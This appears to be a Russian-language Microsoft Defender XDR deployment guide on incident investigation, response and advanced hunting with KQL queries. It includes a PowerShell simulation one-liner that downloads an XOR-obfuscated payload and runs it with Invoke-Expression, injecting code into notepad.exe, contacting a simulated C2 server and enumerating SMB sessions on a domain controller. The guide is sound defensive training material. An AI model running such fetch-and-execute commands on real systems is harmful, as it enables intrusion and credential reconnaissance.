Примечание.
Для доступа к этой странице требуется авторизация. Вы можете попробовать войти или изменить каталоги.
Для доступа к этой странице требуется авторизация. Вы можете попробовать изменить каталоги.
В этой статье описывается процесс создания инцидентов с помощью симуляций и обучающих материалов по атакам, а также использования Microsoft Defender для расследования и реагирования. Перед началом этого процесса убедитесь, что вы ознакомились с общим процессом пилотирования и развертывания Microsoft Defender и хотя бы опробовали некоторые компоненты Microsoft Defender.
Инцидент в Microsoft Defender — это набор коррелированных оповещений и связанных данных, составляющих историю атаки. Службы и приложения Microsoft 365 создают оповещения при обнаружении подозрительного или вредоносного события или действия. Отдельные оповещения предоставляют ценные подсказки о завершенной или продолжающейся атаке. Однако в атаках обычно используются различные методы против различных типов сущностей, например устройств, пользователей и почтовых ящиков. В результате создаются несколько оповещений для нескольких сущностей в вашем арендаторе.
Примечание.
Если вы не знакомы с анализом безопасности и реагированием на инциденты, см. пошаговое руководство по реагированию на первый инцидент , чтобы получить пошаговое руководство по типичному процессу анализа, исправления и проверки после инцидента.
Сквозное развертывание для Microsoft Defender
Это статья 6 из 6 в серии, помогающая развернуть компоненты Microsoft Defender XDR, включая расследование инцидентов и реагирование на них.
Статьи этой серии соответствуют следующим этапам комплексного развертывания:
| Этап | Ссылка |
|---|---|
| A. Запуск пилотного проекта | Запуск пилотного проекта |
| Б. Пилотирование и развертывание компонентов Microsoft Defender |
-
Опробуйте и разверните Defender for Identity - Пилотное развертывание Defender для Office 365 - Пилотное внедрение и развертывание Defender for Endpoint - Пилотное внедрение и развертывание Microsoft Defender for Cloud Apps |
| C. Исследование угроз и реагирование на них | Практическое исследование инцидентов и реагирование на инциденты (эта статья) |
В любое время пилотного и развертывания вы можете протестировать возможности реагирования на инциденты и автоматизированного расследования и устранения Microsoft Defender, создав инцидент с помощью имитации атаки и используя портал Microsoft Defender для расследования и реагирования.
Рабочий процесс для расследования и реагирования на инциденты с использованием Microsoft Defender
Ниже приведен рабочий процесс для изучения инцидентов и реагирования на них с помощью Microsoft Defender XDR в рабочей среде.
Выполните следующие действия:
- Сбор аналитики угроз для выявления злоумышленников и их инфраструктуры
- Имитация атак с помощью портала Microsoft Defender
- Расставьте приоритеты для инцидентов
- Управление инцидентами
- Ознакомьтесь с автоматическим расследованием и реагированием в Центре действий
- Использование расширенной охоты
Этап 1. Сбор аналитики угроз для выявления злоумышленников и их инфраструктуры
Microsoft Threat Intelligence в Microsoft Defender XDR предоставляет индикаторы компрометации (IOC), исследование угроз и анализ от экспертов Microsoft и других источников. Вы можете просматривать статьи по разведке угроз или искать злоумышленников, уязвимости и другие индикаторы для поддержки ваших расследований. Вы можете читать статьи или искать сведения о субъектах киберугроз, уязвимостях и других индикаторах компрометации, чтобы лучше понять, какие типы угроз вы, возможно, захотите расследовать.
- Для обучающего материала по выполнению поиска по индикаторам и сбору разведданных угроз и противников см. раздел: Учебник: Сбор разведданных о угрозах и выполнение цепочек инфраструктуры
- Для учебника по выполнению поиска индикаторов для сбора информации о уязвимостях см.: Учебник: Сбор информации об уязвимостях
Для получения дополнительной информации см. раздел Microsoft Threat Intelligence в Microsoft Defender XDR
Этап 2. Имитация атак с помощью портала Microsoft Defender
Портал Microsoft Defender имеет встроенные возможности для создания имитированных атак в пилотной среде:
Обучение имитации атак для Microsoft Defender XDR для Office 365.
На портале Microsoft Defender выберите Электронная почта и совместная работа >Тренировка имитации атак.
Руководства и имитации атак для Microsoft Defender XDR для конечных точек.
В портале Microsoft Defender выберите Конечные точки > Учебники и имитации.
Обучение симуляции атак Defender для Office 365
Defender для Office 365 с Microsoft 365 E5 или Microsoft Defender для Office 365 план 2 включает обучение имитации атак для фишинговых атак. Ниже приведены основные шаги.
Создание имитации
Для пошаговых инструкций по созданию и запуску новой симуляции см. раздел «Симуляция фишинговой атаки».
Создать полезную нагрузку
Для пошаговых инструкций по созданию полезной нагрузки для использования в симуляции см. раздел «Создать пользовательскую полезную нагрузку для обучения симуляции атак».
Получение аналитических сведений
Для пошаговых инструкций по получению инсайтов с помощью отчетности смотрите раздел «Получение инсайтов через обучение симуляции атак».
Дополнительные сведения см. в разделе Моделирование.
Учебные материалы и моделирование атак в Microsoft Defender для конечной точки
Ниже приведены симуляции Defender для конечной точки от Корпорации Майкрософт:
- Документ удаляет backdoor
- Автоматическое расследование (бэкдор)
Существуют дополнительные имитации из сторонних источников. Также имеется набор руководств.
Для каждой симуляции или обучающего руководства:
Скачайте и прочитайте соответствующее пошаговое руководство, которое прилагается.
Скачайте файл имитации. Вы можете скачать файл или сценарий на тестовом устройстве, но это необязательно.
Запустите файл моделирования или скрипт на тестовом устройстве, как описано в пошаговом документе.
Дополнительные сведения см. в разделе Ознакомьтесь с Microsoft Defender для конечной точки с помощью имитации атаки.
Имитация атаки с помощью изолированного контроллера домена и клиентского устройства (необязательно)
В этом необязательном упражнении по реагированию на инциденты вы имитируете атаку на изолированный контроллер домена доменные службы Active Directory (AD DS) и устройство Windows с помощью сценария PowerShell, а затем изучите, исправите и устраните инцидент.
Сначала необходимо добавить конечные точки в пилотную среду.
Добавление конечных точек пилотной среды
Сначала необходимо добавить изолированный контроллер домена AD DS и устройство Windows в пилотную среду.
Убедитесь, что ваш арендатор пилотной среды включён Microsoft Defender.
Убедитесь, что контроллер домена:
- Работает под управлением Windows Server 2008 R2 или более поздней версии.
- Отправляет данные в Microsoft Defender для удостоверений, и удаленное управление включено.
- Включена интеграция Microsoft Defender для удостоверений и Microsoft Defender for Cloud Apps.
- В тестовом домене создан тестовый пользователь. Разрешения уровня администратора не требуются.
Убедитесь, что тестовое устройство:
- Требуется Windows 10 версии 1903 или более поздней версии.
- Присоединен к домену контроллера домена AD DS.
- Включена Microsoft Defender антивирусная программа. Если у вас возникли проблемы с включением антивирусной программы Microsoft Defender, убедитесь, что Microsoft Defender антивирусная программа не отключена политикой.
- Подключен к Microsoft Defender для конечной точки.
Если вы используете группы клиентов и устройств, создайте выделенную группу устройств для тестового устройства и отправьте ее на верхний уровень.
Одним из альтернативных вариантов является размещение контроллера домена AD DS и тестового устройства в качестве виртуальных машин в службах инфраструктуры Microsoft Azure. Вы можете использовать инструкции из этапа 1 руководства по имитируемой корпоративной лаборатории тестирования, но пропустить создание виртуальной машины APP1.
Следующая схема показывает завершённую пилотную среду.
Вы будете симулировать продвинутую атаку, использующую скрытные техники, чтобы скрыть от обнаружения. В атаке перечислены открытые сессии блока сообщений сервера (SMB) на контроллерах домена. Он также получает недавние IP-адреса устройств пользователей. Безфайловые атаки в памяти, как эта, не сбрасывают файлы на устройство жертвы. Вместо этого они работают только в памяти. Они «живут за счёт земли», используя встроенные системные и административные инструменты. Они также вводят код в системные процессы, чтобы скрыть свои действия. Такое поведение помогает им избегать обнаружения и сохранять работу на устройстве.
В этой симуляции сценарий начинается со скрипта PowerShell. В реальном мире пользователя могут обманом заставить запустить скрипт. Скрипт также может выполняться с удалённого подключения к другому компьютеру с ранее заражённого устройства. Такое поведение говорит о том, что злоумышленник пытается переместиться вбок в сети. Эти скрипты трудно обнаружить, потому что администраторы также запускают скрипты удалённо для рутинных задач.
Во время моделирования атака внедряет shellcode в, казалось бы, невинный процесс. Сценарий требует использования notepad.exe. Мы выбрали этот процесс для моделирования, но злоумышленники, скорее всего, будут ориентироваться на длительный системный процесс, например svchost.exe. Затем код оболочки переходит на связь с сервером команд и управления (C2) злоумышленника, чтобы получить инструкции о том, как действовать. Скрипт пытается выполнить разведывательные запросы к контроллеру домена (DC). Рекогносцировка позволяет злоумышленнику получить сведения о последних учетных данных пользователя. Получив эту информацию, злоумышленники могут перемещаться по сети, чтобы добраться до конкретной конфиденциальной учетной записи.
Важно!
Чтобы обеспечить оптимальные результаты, следуйте инструкциям по имитации атак как можно точнее.
Запуск имитации атаки изолированного контроллера домена AD DS
Чтобы запустить имитацию сценария атаки, выполните следующие действия.
Убедитесь, что пилотная среда включает изолированный контроллер домена AD DS и устройство Windows.
Войдите на тестовое устройство с помощью учетной записи тестового пользователя.
Откройте окно Windows PowerShell на тестовом устройстве.
Скопируйте следующий скрипт имитации:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection'); $base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0; $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i]; $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))Примечание.
Если открыть эту статью в веб-браузере, могут возникнуть проблемы с копированием полного текста без потери определенных символов или создания дополнительных разрывов строк. Если это так, скачайте этот документ и откройте его на Adobe Reader.
Вставьте и запустите скопированный скрипт в окне PowerShell.
Примечание.
Если вы используете PowerShell по протоколу удаленного рабочего стола (RDP), используйте команду Type Clipboard Text (Тип текста буфера обмена) в клиенте RDP, так как горячая клавиша CTRL-V или метод щелчка правой кнопкой мыши может не работать. В последних версиях PowerShell иногда этот метод также не принимается. Может потребоваться сначала скопировать его в Блокнот в памяти, скопировать его на виртуальной машине, а затем вставить в PowerShell.
Через несколько секунд откроется приложение Блокнот. Имитированный код атаки будет внедрен в Блокнот. Оставьте автоматически созданный экземпляр приложения «Блокнот» открытым, чтобы пройти весь сценарий.
Имитированный код атаки попытается связаться с внешним IP-адресом (имитируя сервер C2), а затем попытается выполнить разведку контроллера домена через SMB.
Следующий вывод консоли подтверждает, что имитированное разведывательное действие успешно завершилось против контроллера домена:
ran NetSessionEnum against [DC Name] with return code result 0
Чтобы увидеть функцию автоматизированного реагирования на инциденты и реагирование, оставьте notepad.exe процесс открытым. Вы увидите, как автоматическое реагирование на инциденты останавливает процесс приложения «Блокнот».
Исследуйте инцидент, связанный с имитированной атакой
Примечание.
Прежде чем мы рассмотрим это моделирование, просмотрите следующее видео, чтобы узнать, как управление инцидентами помогает объединить связанные оповещения в рамках процесса исследования, где их можно найти на портале и как это может помочь в операциях безопасности:
Переключившись на точку зрения аналитика SOC, вы можете начать расследование атаки на портале Microsoft Defender.
Откройте портал Microsoft Defender.
На панели навигации выберите Инциденты & Оповещения > Инциденты.
Новый инцидент, связанный с симуляцией атаки, появится в очереди инцидентов.
Исследование атаки как одного инцидента
Microsoft Defender коррелирует аналитику и агрегирует все связанные оповещения и расследования из разных продуктов в одну объект инцидента. Таким образом, Microsoft Defender показывает более широкую историю атак, позволяя аналитику SOC понимать и реагировать на сложные угрозы.
Оповещения, созданные во время этого моделирования, связаны с одной и той же угрозой и, как следствие, автоматически агрегируются как один инцидент.
Чтобы просмотреть инцидент, выполните следующие действия:
Откройте портал Microsoft Defender.
На панели навигации выберите Инциденты & Оповещения > Инциденты.
Выберите самый новый элемент, выбрав круг слева от названия инцидента. На боковой панели отображаются дополнительные сведения об инциденте, включая все связанные оповещения. Каждый инцидент имеет уникальное имя, описывающее его на основе атрибутов оповещений, которые он включает.
Оповещения, отображаемые на панели мониторинга, можно фильтровать по ресурсам служб: Microsoft Defender для удостоверений, Microsoft Defender for Cloud Apps, Microsoft Defender для конечных точек, Microsoft Defender XDR и Microsoft Defender для Office 365.
Выберите Открыть страницу инцидента , чтобы получить дополнительные сведения об инциденте.
На странице Инцидент можно просмотреть все оповещения и сведения, связанные с инцидентом. Сведения включают сущности и ресурсы, связанные с оповещением, источник обнаружения оповещений (например, Microsoft Defender для удостоверений или Microsoft Defender для конечной точки), а также причину, по которой они были связаны между собой. Просмотр списка оповещений об инцидентах показывает ход атаки. В этом представлении можно просматривать и изучать отдельные оповещения.
Вы также можете выбрать Управление инцидентом в меню справа, чтобы пометить инцидент, назначить его себе и добавить примечания.
Просмотр созданных оповещений
Давайте рассмотрим некоторые оповещения, созданные во время имитации атаки.
Примечание.
Мы рассмотрим только несколько оповещений, созданных во время имитации атаки. В зависимости от версии Windows и продуктов Microsoft Defender, работающих на вашем тестовом устройстве, вы можете увидеть больше оповещений в немного другом порядке.
Оповещение: обнаружено подозрительное внедрение в процесс (источник: Microsoft Defender для конечных точек)
Продвинутые злоумышленники используют сложные и скрытые методы для сохранения в памяти и скрытия от средств обнаружения. Одним из распространенных способов является работа в доверенном системном процессе, а не в вредоносном исполняемом файле, что затрудняет обнаружение вредоносного кода средствами обнаружения и операциями безопасности.
Чтобы аналитики SOC могли выявлять эти сложные атаки, сенсоры глубокого анализа памяти в Microsoft Defender для конечных точек обеспечивают нашей облачной службе беспрецедентную видимость различных техник межпроцессного внедрения кода. На следующем рисунке показано, как Defender для конечных точек обнаружил попытку внедрения кода в notepad.exe и сформировал оповещение о ней.
Предупреждение: непредвиденное поведение, наблюдаемое при выполнении процесса без аргументов командной строки (источник: Microsoft Defender для конечной точки)
Средства обнаружения Microsoft Defender для конечной точки часто ориентированы на наиболее распространенный атрибут метода атаки. Этот метод обеспечивает устойчивость и повышает планку перехода злоумышленников на более новую тактику.
Мы используем крупномасштабные алгоритмы обучения для определения нормального поведения общих процессов в организации и во всем мире и следим за тем, когда эти процессы демонстрируют аномальное поведение. Это аномальное поведение часто указывает на то, что был введен посторонний код и выполняется в процессе, который в противном случае является доверенным.
В этом сценарии процесс notepad.exe демонстрирует аномальное поведение, включающее обмен данными с внешним узлом. Обнаружение этой аномальной внешней коммуникации не зависит от конкретного метода введения и выполнения вредоносного кода.
Примечание.
Так как это оповещение основано на моделях машинного обучения, для которых требуется дополнительная серверная обработка, может потребоваться некоторое время, прежде чем вы увидите это оповещение на портале.
Обратите внимание, что сведения об оповещении включают внешний IP-адрес — индикатор, который можно использовать в качестве сводки для расширения исследования.
Выберите IP-адрес в дереве процесса оповещений, чтобы просмотреть страницу сведений об IP-адресе.
При выборе IP-адреса в дереве процесса генерации оповещений откроется страница сведений об IP-адресе и отображается дополнительная информация об этом адресе.
Оповещение: разведка учетных записей пользователей и IP-адресов (SMB) (Источник: Microsoft Defender для удостоверений)
Перечисление с помощью протокола Server Message Block (SMB) позволяет злоумышленникам получать свежие данные о входе пользователя, что помогает им перемещаться по сети и получить доступ к конкретной чувствительной учетной записи.
В этом обнаружении оповещение активируется при выполнении перечисления сеансов SMB в контроллере домена.
Просмотрите временную шкалу устройства с помощью Microsoft Defender для конечной точки
После изучения различных оповещений в этом инциденте вернитесь на главную страницу инцидента на портале Microsoft Defender. Выберите вкладку Устройства на странице инцидента, чтобы просмотреть устройства, связанные с этим инцидентом, сведения о которых предоставлены Microsoft Defender для конечной точки и Microsoft Defender для удостоверений.
Выберите имя устройства, на котором была выполнена атака, чтобы открыть страницу сущности для этого конкретного устройства. На этой странице отображаются активированные оповещения и связанные события.
Выберите вкладку Временная шкала, чтобы открыть временную шкалу устройства и просмотреть все события и модели поведения, наблюдаемые на устройстве в хронологическом порядке, вперемежку с созданными оповещениями.
Расширение некоторых из более интересных вариантов поведения предоставляет полезные сведения, такие как деревья процессов.
Например, прокрутите вниз, пока не найдете событие оповещения Обнаружено подозрительное внедрение в процесс. Выберите расположенное ниже событие процесса powershell.exe, внедрённого в notepad.exe, чтобы отобразить полное дерево процессов для этого поведения на графе Сущности событий на боковой панели. При необходимости используйте строку поиска для фильтрации.
Просмотрите сведения о пользователе с помощью Microsoft Defender for Cloud Apps
На странице инцидента выберите вкладку Пользователи , чтобы отобразить список пользователей, участвующих в атаке. Таблица содержит дополнительные сведения о каждом пользователе, включая оценку приоритета исследования каждого пользователя.
Выберите имя пользователя, чтобы открыть страницу профиля пользователя, где можно провести дальнейшее исследование. Дополнительные сведения см. в статье "Исследование рискованных пользователей в Defender for Cloud Apps".
Автоматизированное расследование и устранение
Примечание.
Прежде чем мы рассмотрим это моделирование, просмотрите следующее видео, чтобы узнать, что такое автоматическое самовосстановление, где найти его на портале и как он может помочь в операциях безопасности:
Вернитесь к инциденту на портале Microsoft Defender. На вкладке Расследования на странице Инцидент отображаются автоматические расследования, запущенные Microsoft Defender для удостоверений и Microsoft Defender для конечной точки. На следующем скриншоте отображается только автоматическое расследование, запущенное Defender for Endpoint. По умолчанию Defender для конечной точки автоматически исправляет артефакты, найденные в очереди, что требует исправления.
Выберите оповещение, которое активировало расследование, чтобы открыть страницу Сведения о расследовании . Вы увидите следующие сведения:
- Оповещения, которые активировали автоматическое исследование.
- Затронутые пользователи и устройства. Если индикаторы находятся на других устройствах, эти другие устройства также будут перечислены.
- Список доказательств. Найденные и проанализированные сущности, такие как файлы, процессы, службы, драйверы и сетевые адреса. Эти сущности анализируются на предмет возможных связей с оповещением и оцениваются как неопасные или вредоносные.
- Обнаружены угрозы. Известные угрозы, обнаруженные в ходе исследования.
Примечание.
В зависимости от времени автоматическое исследование может по-прежнему выполняться. Подождите несколько минут, пока процесс завершится, прежде чем собирать и анализировать доказательства и просматривать результаты. Обновите страницу Сведения о расследовании , чтобы получить последние результаты.
В ходе автоматического расследования Microsoft Defender для конечных точек обнаружил процесс notepad.exe, в который был внедрён код и который был определён как один из артефактов, требующих устранения. Microsoft Defender for Endpoint автоматически останавливает подозрительную инъекцию кода в процесс в рамках автоматического исправления.
Вы увидите, как notepad.exe исчезнет из списка запущенных процессов на тестовом устройстве.
Устранение инцидента
После завершения исследования и подтверждения его устранения вы устраните инцидент.
На странице Инцидент выберите Управление инцидентом. Установите состояние Разрешить инцидент и выберите Истинное оповещение для классификации и Проверка безопасности для определения.
Когда инцидент устранен, в портале Microsoft Defender и связанных с ним порталах закрываются все связанные с ним оповещения.
Это содержит симуляцию атак для анализа инцидентов, автоматического исследования и разрешения инцидентов.
Этап 3. Расставить приоритеты инцидентов
Перейти к очереди инцидентов можно из раздела Инциденты и оповещения > Инциденты на панели быстрого запуска портала Microsoft Defender. Ниже приведен пример.
Раздел «Самые свежие инциденты и предупреждения » показывает график предупреждений и инцидентов за последние 24 часа.
Чтобы проверить и расставить приоритеты инцидентов, вы можете:
Выберите столбцы , чтобы показать детали каждого инцидента или затронутых от него объектов. Используйте эти данные, чтобы решить, какие инциденты анализировать в первую очередь.
Применяйте фильтры, чтобы сосредоточиться на конкретной угрозе или сценарии. Фильтры помогают определить, какие инциденты требуют быстрого реагирования.
Из очереди инцидентов выберите Filters , чтобы открыть панель Filters . Используйте его, чтобы сузить список до конкретного набора инцидентов. Ниже приведен пример.
Дополнительные сведения см. в разделе Определение приоритетов инцидентов.
Этап 4. Управление инцидентами
Вы можете управлять инцидентами в области Управление инцидентом для инцидента. Ниже приведен пример.
Эту панель можно отобразить по ссылке Управление инцидентом на:
- Панель свойств инцидента в очереди инцидентов.
- Страница сводки инцидента.
Ниже приведены способы управления инцидентами.
Изменение имени инцидента
Измените имя, назначаемое автоматически, в соответствии с рекомендациями группы безопасности.
Добавление тегов инцидента
Добавьте теги, которые группа безопасности использует для классификации инцидентов, которые можно отфильтровать позже.
Назначение инцидента
Назначьте его имени учетной записи пользователя, которое можно отфильтровать позже.
Разрешение инцидента
Закройте инцидент после его устранения.
Настройка классификации и определения.
Классифицируйте и выберите тип угрозы при разрешении инцидента.
Добавление примечаний
Используйте комментарии для отслеживания прогресса, добавления заметок или обмена другими деталями. Полную историю комментариев можно посмотреть в разделе «Комментарии и история » на странице с деталями инцидента.
Дополнительные сведения см. в разделе Управление инцидентами.
Этап 5. Ознакомьтесь с автоматизированным расследованием и реагированием в Центре действий
В зависимости от вашей организации действия по устранению проблем выполняются автоматически или ждут одобрения вашей команды безопасности. Центр действий перечисляет все действия в одном месте, будь то ожидающие или выполненные. Она охватывает устройства, контент для электронной почты и совместной работы, а также идентичности.
Ниже приведен пример.
Из центра действий выберите ожидающие действия. Затем одобрите или отклоните их в панели с вылетаю. Ниже приведен пример.
Одобряйте или отклоняйте ожидаемые действия как можно скорее. Это помогает автоматизированным расследованиям завершиться вовремя.
Дополнительные сведения см. в разделах Автоматизированное исследование и реагирование и Центр уведомлений.
Этап 6. Использование расширенной охоты
Примечание.
Прежде чем мы рассмотрим расширенное моделирование охоты, просмотрите следующее видео, чтобы понять концепции расширенной охоты, узнать, где его можно найти на портале, и узнать, как он может помочь вам в операциях по обеспечению безопасности.
Если бы необязательная симуляция атак PowerShell без файлов была реальной атакой, достигшей стадии доступа к учетным данным, вы можете использовать расширенную охоту на любом этапе расследования. Продвинутая охота позволяет искать события и записи в сети, используя то, что вы уже знаете из оповещений и затронутых сущностей.
Например, используйте информацию из оповещения пользователя и оповещения о IP-адресах (SMB ) для запроса в IdentityDirectoryEvents таблицу событий перечисления сессий SMB. Также можно найти активность обнаружения в других протоколах, запросив таблицу IdentityQueryEvents .
Требования к среде охоты
Для этого моделирования требуется один внутренний почтовый ящик и устройство. Для отправки тестового сообщения также потребуется внешняя учетная запись электронной почты.
Убедитесь, что ваш арендатор включил Microsoft Defender.
Определите целевой почтовый ящик, который будет использоваться для получения электронной почты.
Этот почтовый ящик должен отслеживаться Microsoft Defender для Office 365
Устройство из требования 3 должно получить доступ к этому почтовому ящику
Настройка тестового устройства:
а. Убедитесь, что используется Windows 10 версии 1903 или более поздней.
б. Присоединение тестового устройства к тестовму домену.
c. Включите антивирусную программу Microsoft Defender. Если у вас возникли проблемы с включением антивирусной программы Microsoft Defender, убедитесь, что Microsoft Defender антивирусная программа не отключена политикой.
Запуск имитации
Из внешней учетной записи электронной почты отправьте сообщение в почтовый ящик, указанный на шаге 2 раздела "Требования к среде охоты". Включите вложение, которое будет разрешено с помощью любых существующих политик фильтрации электронной почты. Этот файл не обязательно должен быть вредоносным или исполняемым файлом. Предлагаемые типы файлов :.pdf, .exe (если это разрешено) или тип документов Office, например Word файл.
Откройте отправленное сообщение электронной почты с устройства, настроенного в соответствии с определением на шаге 3 раздела "Требования к среде охоты". Откройте вложение или сохраните файл на устройстве.
Отправиться на охоту
Откройте портал Microsoft Defender.
В области навигации выберите Охота > Расширенная охота.
Создайте запрос, который начинается с сбора событий электронной почты.
Выберите Создать запрос>.
В группе Email в разделе Расширенный поиск дважды щелкните EmailEvents. Это должно отобразиться в окне запроса.
EmailEventsИзмените интервал времени запроса на последние 24 часа. Предполагается, что письмо, которое вы отправили при запуске описанной выше симуляции, было отправлено в течение последних 24 часов; в противном случае при необходимости измените временной диапазон.
Выберите Выполнить запрос. Результаты могут отличаться в зависимости от пилотной среды.
Примечание.
Вы можете добавить условие где для фильтрации результатов, как показано на следующем шаге.
Примечание.
Расширенный поиск отображает результаты запроса в виде табличных данных. Вы также можете просмотреть данные в других форматах, таких как диаграммы.
Просмотрите результаты и проверьте, можно ли определить открытое сообщение электронной почты. Для отображения сообщения в расширенной охоте может потребоваться до двух часов. Чтобы сузить результаты, можно добавить условие where в запрос, чтобы искать только сообщения электронной почты с yahoo.com в качестве senderMailFromDomain. Ниже приведен пример.
EmailEvents | where SenderMailFromDomain == "yahoo.com"Выберите результирующие строки из запроса, чтобы можно было проверить запись.
Теперь, когда вы убедились, что видите сообщение электронной почты, добавьте фильтр для вложений. Сосредоточьтесь на всех сообщениях электронной почты с вложениями в среде. Для этого моделирования сосредоточьтесь на входящих сообщениях электронной почты, а не на тех, которые отправляются из вашей среды. Удалите все фильтры, добавленные для поиска сообщения, и добавьте "| where AttachmentCount > 0 и EmailDirection == "Inbound""
Следующий запрос возвращает только входящие письма с вложениями, что сужает результат вашего первоначального запроса:
EmailEvents | where AttachmentCount > 0 and EmailDirection == "Inbound"Затем добавьте сведения о вложении (например, имя файла, хэши) в результирующий набор. Для этого присоединитесь к таблице EmailAttachmentInfo . В данном случае для присоединения используются стандартные поля NetworkMessageId и RecipientObjectId.
Следующий запрос основывается на предыдущем, присоединяясь к таблице EmailAttachmentInfo для добавления деталей вложений (таких как имя файла и хеши) в ваши результаты. Также поле временной метки переименовано в EmailTimestamp , чтобы на последующих этапах можно было отличить временные метки письма от временных меток действия файла.
EmailEvents | where AttachmentCount > 0 and EmailDirection == "Inbound" | project-rename EmailTimestamp=Timestamp | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectIdЗатем используйте значение SHA256 из таблицы EmailAttachmentInfo , чтобы найти DeviceFileEvents (действия с файлами, которые произошли в конечной точке) для этого хэша. Общим полем здесь будет хэш SHA256 для вложения.
Следующий запрос расширяет предыдущий, объединяя таблицу DeviceFileEvents с помощью хэша SHA256 . Это связывает вложения электронной почты с действиями файлов на конечной точке, чтобы вы могли видеть, какие устройства получили файл и что с ним произошло. Результаты включают детали конечных точек из Microsoft Defender для конечной точки, такие как имя устройства, тип действия (фильтруемое до событий FileCreated), расположение хранилища файлов и имя учетной записи, связанное с процессом.
EmailEvents | where AttachmentCount > 0 and EmailDirection == "Inbound" | project-rename EmailTimestamp=Timestamp | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId | join DeviceFileEvents on SHA256 | where ActionType == "FileCreated"Теперь вы создали запрос, который будет определять все входящие сообщения электронной почты, в которых пользователь открыл или сохранил вложение. Вы также можете уточнить этот запрос, чтобы отфильтровать конкретные домены отправителя, размеры файлов, типы файлов и т. д.
Функции — это особый вид соединения, который позволяет извлекать больше данных TI о файле, таких как его распространенность, сведения о подписывшем и издателе и т. д. Чтобы получить дополнительные сведения о файле, используйте функцию обогащения FileProfile().
EmailEvents | where AttachmentCount > 0 and EmailDirection == "Inbound" | project-rename EmailTimestamp=Timestamp | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId | join DeviceFileEvents on SHA256 | where ActionType == "FileCreated" | distinct SHA1 | invoke FileProfile()
Создание обнаружения
После того как вы создали запрос, который выявляет сведения, о которых вы хотите получать оповещения, если соответствующие события произойдут в будущем, вы можете создать на основе этого запроса настраиваемое правило обнаружения.
Настраиваемые правила обнаружения будут выполнять запрос с заданной вами периодичностью, а результаты выполнения запросов будут создавать оповещения безопасности на основе выбранных вами затронутых ресурсов. Эти оповещения будут соотноситься с инцидентами и могут рассматриваться как любое другое оповещение системы безопасности, созданное одним из продуктов.
На странице запроса удалите
distinct SHA1иinvoke FileProfile()строки, добавленные в предыдущей процедуре, а затем выберите "Создать правило обнаружения".Примечание.
Если выбрать Создать правило обнаружения и в запросе возникли синтаксические ошибки, правило обнаружения не будет сохранено. Перепроверьте ваш запрос, чтобы убедиться, что в нём нет ошибок.
Заполните необходимые поля сведениями, которые позволят команде безопасности понять оповещение, почему оно было создано и какие действия вы ожидаете от них.
Убедитесь, что вы заполняете поля с чёткостью, чтобы следующий пользователь принял обоснованное решение по этому правилу обнаружения.
Выберите сущности, затронутые этим оповещением. В этом случае выберите Устройство и почтовый ящик.
Определите, какие действия должны выполняться при срабатывании оповещения. Для этого правила обнаружения запустите сканирование антивируса, хотя могут быть предприняты и другие действия.
Выберите область для правила генерации оповещений. Поскольку этот запрос связан с устройствами, группы устройств учитываются в этом настраиваемом обнаружении в контексте Microsoft Defender для конечной точки. При создании настраиваемого обнаружения, которое не включает устройства как затронутые сущности, область действия не применяется.
Для пилотного развертывания Microsoft Defender XDR, возможно, стоит ограничить это правило лишь подмножеством тестовых устройств в вашей производственной среде.
Нажмите Создать. Затем выберите Настраиваемые правила обнаружения на панели навигации.
На этой странице можно выбрать правило обнаружения, которое откроет страницу сведений.
Подготовка экспертов по расширенной охоте
Отслеживание злоумышленника — это серия веб-трансляций для новых аналитиков безопасности и опытных охотников за угрозами. Он поможет вам пройти через основы расширенной охоты на весь путь к созданию собственных сложных запросов.
Чтобы приступить к работе, см . статью Подготовка экспертов по расширенной охоте .
Дальнейшие действия
Интегрируйте информацию из Investigation и отвечайте с помощью Microsoft Defender в ваши процессы SecOps.